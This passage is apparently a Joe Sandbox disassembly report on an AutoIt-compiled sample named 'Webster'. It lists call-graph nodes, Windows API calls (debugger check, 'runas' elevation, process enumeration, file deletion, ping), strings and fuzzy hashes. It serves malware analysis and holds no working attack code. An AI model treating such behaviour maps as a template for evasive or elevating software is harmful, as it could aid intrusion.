calls 99015->99050 99017 aa0e4d 99016->99017 99018 aa0ee5 LoadLibraryExW 99017->99018 99019 aa0ed3 FindCloseChangeNotification 99017->99019 99020 aa0eb3 99017->99020 99018->99020 99019->99020 99020->98970 99020->98971 99021->98954 99022->98954 99023->98974 99025 a847c6 99024->99025 99026 aa0fe6 Mailbox 59 API calls 99025->99026 99027 a847d4 99026->99027 99028 a847e0 99027->99028 99051 a846ec 59 API calls Mailbox 99027->99051 99030 a84540 99028->99030 99052 a84650 99030->99052 99032 a8454f 99033 aa0fe6 Mailbox 59 API calls 99032->99033 99034 a845eb 99032->99034 99033->99034 99034->98987 99035 a84230 59 API calls Mailbox 99034->99035 99035->98981 99036->98987 99037->98987 99038->98959 99039->98987 99042 adf92e __NMSG_WRITE 99040->99042 99041 adf96d 99041->98994 99041->98999 99042->99041 99045 adf963 99042->99045 99046 adfa14 99042->99046 99045->99041 99048 a914db 61 API calls 99045->99048 99046->99041 99049 a914db 61 API calls 99046->99049 99047->99000 99048->99045 99049->99046 99050->99015 99051->99028 99053 a84659 Mailbox 99052->99053 99054 abd6ec 99053->99054 99059 a84663 99053->99059 99056 aa0fe6 Mailbox 59 API calls 99054->99056 99055 a8466a 99055->99032 99057 abd6f8 99056->99057 99059->99055 99060 a85190 59 API calls Mailbox 99059->99060 99060->99059 99062 a83b3f 99061->99062 99067 a83b67 99061->99067 99063 a83b4d 99062->99063 99064 a83b31 59 API calls 99062->99064 99065 a83b53 99063->99065 99066 a83b31 59 API calls 99063->99066 99064->99063 99065->99067 99071 a85190 59 API calls Mailbox 99065->99071 99066->99065 99067->98630 99069->98631 99070->98627 99071->99067 99073 a83e11 99072->99073 99074 a83c43 99072->99074 99073->98649 99075 a91207 59 API calls 99074->99075 99078 a83c54 99074->99078 99076 a83e73 99075->99076 99077 aa2f70 __cinit 67 API calls 99076->99077 99077->99078 99078->98649 99079->98654 99080->98294 99081->98295 99082->98194 99083->98189 99084->98190 99085->98189 99086->98186 99088 aa59b7 99087->99088 99096 aa5948 99087->99096 99113 aa35d1 
DecodePointer 99088->99113 99090 aa59bd 99114 aa8d58 58 API calls __getptd_noexit 99090->99114 99093 aa597b RtlAllocateHeap 99093->99096 99103 aa59af 99093->99103 99095 aa59a3 99111 aa8d58 58 API calls __getptd_noexit 99095->99111 99096->99093 99096->99095 99100 aa59a1 99096->99100 99101 aa5953 99096->99101 99110 aa35d1 DecodePointer 99096->99110 99112 aa8d58 58 API calls __getptd_noexit 99100->99112 99101->99096 99107 aaa39b 58 API calls __NMSG_WRITE 99101->99107 99108 aaa3f8 58 API calls 4 library calls 99101->99108 99109 aa32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99101->99109 99103->98198 99104->98198 99105->98202 99106->98204 99107->99101 99108->99101 99110->99096 99111->99100 99112->99103 99113->99090 99114->99103 99116 aa2e80 __setmode 99115->99116 99123 aa3447 99116->99123 99122 aa2ea7 __setmode 99122->98102 99140 aa9e3b 99123->99140 99125 aa2e89 99126 aa2eb8 DecodePointer DecodePointer 99125->99126 99127 aa2e95 99126->99127 99128 aa2ee5 99126->99128 99137 aa2eb2 99127->99137 99128->99127 99186 aa89d4 59 API calls __vswprintf_l 99128->99186 99130 aa2f48 EncodePointer EncodePointer 99130->99127 99131 aa2f1c 99131->99127 99135 aa2f36 EncodePointer 99131->99135 99188 aa8a94 61 API calls 2 library calls 99131->99188 99132 aa2ef7 99132->99130 99132->99131 99187 aa8a94 61 API calls 2 library calls 99132->99187 99135->99130 99136 aa2f30 99136->99127 99136->99135 99189 aa3450 99137->99189 99141 aa9e5f EnterCriticalSection 99140->99141 99142 aa9e4c 99140->99142 99141->99125 99147 aa9ec3 99142->99147 99144 aa9e52 99144->99141 99171 aa32e5 58 API calls 3 library calls 99144->99171 99148 aa9ecf __setmode 99147->99148 99149 aa9ed8 99148->99149 99150 aa9ef0 99148->99150 99172 aaa39b 58 API calls __NMSG_WRITE 99149->99172 99162 aa9f11 __setmode 99150->99162 99175 aa8a4d 58 API calls __malloc_crt 99150->99175 99152 aa9edd 99173 aaa3f8 58 API calls 4 library calls 99152->99173 99155 aa9f05 99157 aa9f1b 99155->99157 99158 aa9f0c 99155->99158 
99156 aa9ee4 99174 aa32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99156->99174 99159 aa9e3b __lock 58 API calls 99157->99159 99176 aa8d58 58 API calls __getptd_noexit 99158->99176 99163 aa9f22 99159->99163 99162->99144 99165 aa9f2f 99163->99165 99166 aa9f47 99163->99166 99177 aaa05b InitializeCriticalSectionAndSpinCount 99165->99177 99178 aa2f85 99166->99178 99169 aa9f3b 99184 aa9f63 LeaveCriticalSection _doexit 99169->99184 99172->99152 99173->99156 99175->99155 99176->99162 99177->99169 99179 aa2fb7 _free 99178->99179 99180 aa2f8e RtlFreeHeap 99178->99180 99179->99169 99180->99179 99181 aa2fa3 99180->99181 99185 aa8d58 58 API calls __getptd_noexit 99181->99185 99183 aa2fa9 GetLastError 99183->99179 99184->99162 99185->99183 99186->99132 99187->99131 99188->99136 99192 aa9fa5 LeaveCriticalSection 99189->99192 99191 aa2eb7 99191->99122 99192->99191 99193 a89b8b 99194 a886e0 277 API calls 99193->99194 99195 a89b99 99194->99195 99196 a89a6c 99199 a8829c 99196->99199 99198 a89a78 99200 a88308 99199->99200 99201 a882b4 99199->99201 99205 a88331 99200->99205 99208 aea48d 89 API calls 4 library calls 99200->99208 99201->99200 99202 a853b0 277 API calls 99201->99202 99206 a882eb 99202->99206 99204 ac0ed8 99204->99204 99205->99198 99206->99205 99207 a8523c 59 API calls 99206->99207 99207->99200 99208->99204 99209 ae92c8 99210 ae92db 99209->99210 99211 ae92d5 99209->99211 99213 aa2f85 _free 58 API calls 99210->99213 99214 ae92ec 99210->99214 99212 aa2f85 _free 58 API calls 99211->99212 99212->99210 99213->99214 99215 aa2f85 _free 58 API calls 99214->99215 99216 ae92fe 99214->99216 99215->99216 99217 abe463 99229 a8373a 99217->99229 99219 abe479 99220 abe4fa 99219->99220 99221 abe48f 99219->99221 99223 a8b020 277 API calls 99220->99223 99238 a85376 60 API calls 99221->99238 99224 abe4ee Mailbox 99223->99224 99228 abf046 Mailbox 99224->99228 99240 aea48d 89 API calls 4 library calls 99224->99240 99226 abe4ce 99226->99224 99239 ae890a 59 API calls 
100995 a955f9 LoadLibraryA 100993->100995 100994->100986 100994->100987 100995->100994 100996 a9560a GetProcAddress 100995->100996 100996->100994 100997 abdcb4 100998 aa0fe6 Mailbox 59 API calls 100997->100998 100999 abdcbb 100998->100999 101000 a84e77 100999->101000 101002 ae5f90 100999->101002 101003 ae5fb3 101002->101003 101004 ae6066 101003->101004 101005 aa0fe6 Mailbox 59 API calls 101003->101005 101004->101000 101008 ae5fef 101005->101008 101007 ae600e 101007->101004 101009 a91c9c 59 API calls 101007->101009 101008->101007 101010 ae6071 59 API calls 101008->101010 101009->101007 101010->101008 101011 a87357 101012 a878f5 101011->101012 101013 a87360 101011->101013 101021 a86fdb Mailbox 101012->101021 101028 ad87f9 59 API calls _memmove 101012->101028 101013->101012 101014 a84d37 84 API calls 101013->101014 101015 a8738b 101014->101015 101015->101012 101017 a8739b 101015->101017 101022 a91680 101017->101022 101018 abf91b 101020 a91c9c 59 API calls 101018->101020 101020->101021 101023 a91692 101022->101023 101026 a916ba _memmove 101022->101026 101024 aa0fe6 Mailbox 59 API calls 101023->101024 101023->101026 101025 a9176f _memmove 101024->101025 101027 aa0fe6 Mailbox 59 API calls 101025->101027 101026->101021 101027->101025 101028->101018
                                                                                  APIs
                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A9526C
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00A9527E
                                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00A952E6
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                    • Part of subcall function 00A8BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A8BC07
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00A95366
                                                                                  • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 00AD0B2E
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00AD0B66
                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B36D10), ref: 00AD0BE9
                                                                                  • ShellExecuteW.SHELL32(00000000), ref: 00AD0BF0
                                                                                    • Part of subcall function 00A9514C: GetSysColorBrush.USER32(0000000F), ref: 00A95156
                                                                                    • Part of subcall function 00A9514C: LoadCursorW.USER32(00000000,00007F00), ref: 00A95165
                                                                                    • Part of subcall function 00A9514C: LoadIconW.USER32(00000063), ref: 00A9517C
                                                                                    • Part of subcall function 00A9514C: LoadIconW.USER32(000000A4), ref: 00A9518E
                                                                                    • Part of subcall function 00A9514C: LoadIconW.USER32(000000A2), ref: 00A951A0
                                                                                    • Part of subcall function 00A9514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A951C6
                                                                                    • Part of subcall function 00A9514C: RegisterClassExW.USER32(?), ref: 00A9521C
                                                                                    • Part of subcall function 00A950DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A95109
                                                                                    • Part of subcall function 00A950DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A9512A
                                                                                    • Part of subcall function 00A950DB: ShowWindow.USER32(00000000), ref: 00A9513E
                                                                                    • Part of subcall function 00A950DB: ShowWindow.USER32(00000000), ref: 00A95147
                                                                                    • Part of subcall function 00A959D3: _memset.LIBCMT ref: 00A959F9
                                                                                    • Part of subcall function 00A959D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A95A9E
                                                                                  Strings
                                                                                  • AutoIt, xrefs: 00AD0B23
                                                                                  • runas, xrefs: 00AD0BE4
                                                                                  • It is a violation of the AutoIt EULA to attempt to reverse user this program., xrefs: 00AD0B28
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                  • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                                                                                  • API String ID: 529118366-2030392706
                                                                                  • Opcode ID: 6271ab9402db1d0c2abd97dd6780ce0c8f496785cb18e4d0bea2949c193eee9a
                                                                                  • Instruction ID: e8e6f5b6e9fb942f630f8181ddf3142afaa8d697d5abbd515deda216aa4494b1
                                                                                  • Opcode Fuzzy Hash: 6271ab9402db1d0c2abd97dd6780ce0c8f496785cb18e4d0bea2949c193eee9a
                                                                                  • Instruction Fuzzy Hash: 3151D331F48249AACF12BBB0DD56EEE7BF8AB06340F1041A5F451672A2DFF04A45DB61
                                                                                  APIs
                                                                                  • GetVersionExW.KERNEL32(?), ref: 00A95D40
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                  • GetCurrentProcess.KERNEL32(?,00B10A18,00000000,00000000,?), ref: 00A95E07
                                                                                  • IsWow64Process.KERNEL32(00000000), ref: 00A95E0E
                                                                                  • GetNativeSystemInfo.KERNEL32(00000000), ref: 00A95E54
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00A95E5F
                                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00A95E90
                                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00A95E9C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 1986165174-0
                                                                                  • Opcode ID: 74f677873b4f88830c9341a24a55d1da4bfdf0c28275d86a76e4384fb324f96b
                                                                                  • Instruction ID: 3c24dc03dd3468ec0d0f384a6a8e13fea7210a64abde9ecfb2912f123df70c0d
                                                                                  • Opcode Fuzzy Hash: 74f677873b4f88830c9341a24a55d1da4bfdf0c28275d86a76e4384fb324f96b
                                                                                  • Instruction Fuzzy Hash: 0591F531A4DBC0DECB32DB7884515AAFFF56F2A300B884A5ED0C793B01D631AA48C759
                                                                                  APIs
                                                                                    • Part of subcall function 00AA0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A92A58,?,00008000), ref: 00AA02A4
                                                                                    • Part of subcall function 00AE4FEC: GetFileAttributesW.KERNEL32(?,00AE3BFE), ref: 00AE4FED
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00AE407C
                                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00AE40CC
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AE40DD
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AE40F4
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AE40FD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 2649000838-1173974218
                                                                                  • Opcode ID: 90c511c713a70832f4a5b14ea93fdac5765d99c368986db313b4cc607832e060
                                                                                  • Instruction ID: 888f0342082a9c605c41eec3fd1db383906d8d2ddbb4bd2acbfcb1fd27db5c68
                                                                                  • Opcode Fuzzy Hash: 90c511c713a70832f4a5b14ea93fdac5765d99c368986db313b4cc607832e060
                                                                                  • Instruction Fuzzy Hash: 3F316B311183869BC601FF60C9958EFB7ECBE95304F444A2DF5E183191EB349A09CBA2
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00AE416D
                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00AE417B
                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00AE419B
                                                                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 00AE4245
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                  • String ID:
                                                                                  • API String ID: 3243318325-0
                                                                                  • Opcode ID: a6c4572d20236872cc9c0d313972dc3c6728003f85d3c35edf2e5b684d458bef
                                                                                  • Instruction ID: 809da9100080e913a2fea625fcfaa4f535d82724a54a2637d66787943de75e64
                                                                                  • Opcode Fuzzy Hash: a6c4572d20236872cc9c0d313972dc3c6728003f85d3c35edf2e5b684d458bef
                                                                                  • Instruction Fuzzy Hash: 5C3181712083429FD700EF55D885AEFBBF8AF99350F40092DF585C31A1EB719A49CB52
                                                                                  APIs
                                                                                    • Part of subcall function 00A93740: CharUpperBuffW.USER32(?,00B471DC,00000000,?,00000000,00B471DC,?,00A853A5,?,?,?,?), ref: 00A9375D
                                                                                  • _memmove.LIBCMT ref: 00A8B68A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpper_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 2819905725-0
                                                                                  • Opcode ID: 5c9484ee4bacfaac9a26a49a898b1eb9b2da302c9cb17c393ace3cf304a8d856
                                                                                  • Instruction ID: 9c3aa79ecc67209427fff7130a390d0fe83b3e4967153dba67dd5366c1451fd1
                                                                                  • Opcode Fuzzy Hash: 5c9484ee4bacfaac9a26a49a898b1eb9b2da302c9cb17c393ace3cf304a8d856
                                                                                  • Instruction Fuzzy Hash: C4A278716183419FCB24EF18C580B2AB7F1BF89304F15896DE89A8B361D771ED45CBA2
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNEL32(?,00ACFC86), ref: 00AE495A
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00AE496B
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AE497B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                                  • String ID:
                                                                                  • API String ID: 48322524-0
                                                                                  • Opcode ID: 4f563899515d1870f5f126080455320547aaed77223aed4752adcb03144b08f9
                                                                                  • Instruction ID: a693949508d0b37af7e21b2ba180a89f261ffeabda5eb766d2e105a75b88cb90
                                                                                  • Opcode Fuzzy Hash: 4f563899515d1870f5f126080455320547aaed77223aed4752adcb03144b08f9
                                                                                  • Instruction Fuzzy Hash: 0EE0DF31820515AB82107B38EC0D8EA775C9E0A339F904705F835E20E0EBB49D9886D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  APIs
                                                                                  • timeGetTime.WINMM ref: 00A8BF57
                                                                                    • Part of subcall function 00A852B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A852E6
                                                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 00AC36B5
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: MessagePeekSleepTimetime
                                                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                                  • API String ID: 1792118007-922114024
                                                                                  APIs
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00A83444
                                                                                  • RegisterClassExW.USER32(00000030), ref: 00A8346E
                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A8347F
                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00A8349C
                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A834AC
                                                                                  • LoadIconW.USER32(000000A9), ref: 00A834C2
                                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A834D1
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                  • API String ID: 2914291525-1005189915
                                                                                  APIs
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00A83444
                                                                                  • RegisterClassExW.USER32(00000030), ref: 00A8346E
                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A8347F
                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00A8349C
                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A834AC
                                                                                  • LoadIconW.USER32(000000A9), ref: 00A834C2
                                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A834D1
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                  • API String ID: 2914291525-1005189915
                                                                                  APIs
                                                                                    • Part of subcall function 00AA00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00A93094), ref: 00AA00ED
                                                                                    • Part of subcall function 00AA08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00A9309F), ref: 00AA08E3
                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A930E2
                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00AD01BA
                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00AD01FB
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00AD0239
                                                                                  • _wcscat.LIBCMT ref: 00AD0292
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                  • API String ID: 2673923337-2727554177
                                                                                  APIs
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00A95156
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00A95165
                                                                                  • LoadIconW.USER32(00000063), ref: 00A9517C
                                                                                  • LoadIconW.USER32(000000A4), ref: 00A9518E
                                                                                  • LoadIconW.USER32(000000A2), ref: 00A951A0
                                                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A951C6
                                                                                  • RegisterClassExW.USER32(?), ref: 00A9521C
                                                                                    • Part of subcall function 00A83411: GetSysColorBrush.USER32(0000000F), ref: 00A83444
                                                                                    • Part of subcall function 00A83411: RegisterClassExW.USER32(00000030), ref: 00A8346E
                                                                                    • Part of subcall function 00A83411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A8347F
                                                                                    • Part of subcall function 00A83411: InitCommonControlsEx.COMCTL32(?), ref: 00A8349C
                                                                                    • Part of subcall function 00A83411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A834AC
                                                                                    • Part of subcall function 00A83411: LoadIconW.USER32(000000A9), ref: 00A834C2
                                                                                    • Part of subcall function 00A83411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A834D1
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                  • String ID: #$0$AutoIt v3
                                                                                  • API String ID: 423443420-4155596026
                                                                                  APIs
                                                                                  • WSAStartup.WS2_32(00000101,?), ref: 00AF5E7E
                                                                                  • inet_addr.WSOCK32(?,?,?), ref: 00AF5EC3
                                                                                  • gethostbyname.WS2_32(?), ref: 00AF5ECF
                                                                                  • IcmpCreateFile.IPHLPAPI ref: 00AF5EDD
                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00AF5F4D
                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00AF5F63
                                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00AF5FD8
                                                                                  • WSACleanup.WSOCK32 ref: 00AF5FDE
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                  • String ID: Ping
                                                                                  • API String ID: 1028309954-2246546115
                                                                                  APIs
                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00A94E22
                                                                                  • KillTimer.USER32(?,00000001), ref: 00A94E4C
                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A94E6F
                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A94E7A
                                                                                  • CreatePopupMenu.USER32 ref: 00A94E8E
                                                                                  • PostQuitMessage.USER32(00000000), ref: 00A94EAF
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                  • String ID: TaskbarCreated
                                                                                  • API String ID: 129472671-2362178303
                                                                                  APIs
                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00AD0C5B
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                  • _memset.LIBCMT ref: 00A95787
                                                                                  • _wcscpy.LIBCMT ref: 00A957DB
                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A957EB
                                                                                  • __swprintf.LIBCMT ref: 00AD0CD1
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                                  • String ID: Line %d: $AutoIt -
                                                                                  • API String ID: 230667853-4094128768
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A95109
